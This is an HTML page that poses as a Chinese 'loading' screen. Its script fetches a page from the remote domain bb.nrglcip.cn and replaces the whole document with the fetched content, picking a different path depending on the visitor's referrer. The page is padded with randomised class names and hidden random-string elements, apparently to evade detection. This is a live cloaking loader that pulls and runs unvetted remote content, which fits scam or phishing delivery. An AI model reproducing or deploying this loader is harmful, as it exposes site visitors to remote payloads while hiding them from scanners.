<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .nDGxK7gNTA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .nDGxK7gNTA .eIVt34 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .nDGxK7gNTA .content {
            line-height: 50px;
            text-align: center
        }

        .nDGxK7gNTA .img {
            width: 100%
        }

        .nDGxK7gNTA .eGGNcJN {
            text-align: center
        }

        .nDGxK7gNTA .eGGNcJN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .nDGxK7gNTA .eGGNcJN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .nDGxK7gNTA .eGGNcJN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .nDGxK7gNTA .eGGNcJN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .nDGxK7gNTA .eGGNcJN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .nDGxK7gNTA .eGGNcJN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .nDGxK7gNTA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function PQjUIUsEukpm(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CMth4 = PQjUIUsEukpm('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CMth4 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CMth4 +".html?a=share";
		}
		
        QFPnMzvA3=url+"#"+new Date().getTime();
        QFPnMzvA3 && function() {
            $.get(QFPnMzvA3, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>d5qDnqIuy4DmF2NDtkImFPsirFpC3513AXSAQSju3Xs0nT8bXZNJfWynANKcdrKXbQz81b1gIDkYmgOrwMM</a>
<span style='display:none'>jVImcR8eSOkY</span>
<ul style='display:none' >MNW5u9CBwZ4ipypOhZ</ul>
<p  style='display:none'>s7Jbr7racXE</p>
<img  src='' style='display:none'>
<li style='display:none' >eufk0ZjfQAcsSKwWpTIWlmzDPf4scATj1QFExxzPVjTdE50HZ7SBZmLsgDLhQ1MhendVzvrqaPbMzW7gUDu4LNvRsFgcV</li><div class="nDGxK7gNTA">
    <div class="eIVt34">
        <div class="eGGNcJN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >gTzVqbU7yhzrXnXWOvqvNW82DHwmYJX8FtcfC</b>
<div style='display:none'>ZAjta3GBCzXZmaN8FTwlxMVxkLm5th4aGTfEC6MQkoMTpLum8sHb</div>
<h1 style='display:none' >rRY8bbkrYi7ATGwSjfcNcHRL4f6SiWDXhvbMy58n0h07LE</h1>
<h1 style='display:none' >rRY8bbkrYi7ATGwSjfcNcHRL4f6SiWDXhvbMy58n0h07LE</h1>
<li style='display:none' >jODGcv0Ztc6hIoScH7YruKHT0ugvHXjWAS2o49dMkdr3MbuzroirGmBMz</li>
<ul style='display:none' >QoRbiDu9eOJgOLuVAbtHNLM0jmJHKdb2Sn9ZALrLY</ul>
<a  href='#' style='display:none'>Tg2i8lGhxUmK4mECvqPFHX0ZZc0eCDpzR48Db7atIlj82DElYq9ArjeQUPVnBSor</a>
<ul style='display:none' >QoRbiDu9eOJgOLuVAbtHNLM0jmJHKdb2Sn9ZALrLY</ul>
<p  style='display:none'>L3f33pFTLOYh89khPWy4WkFnVXjxsko</p></body>
</html>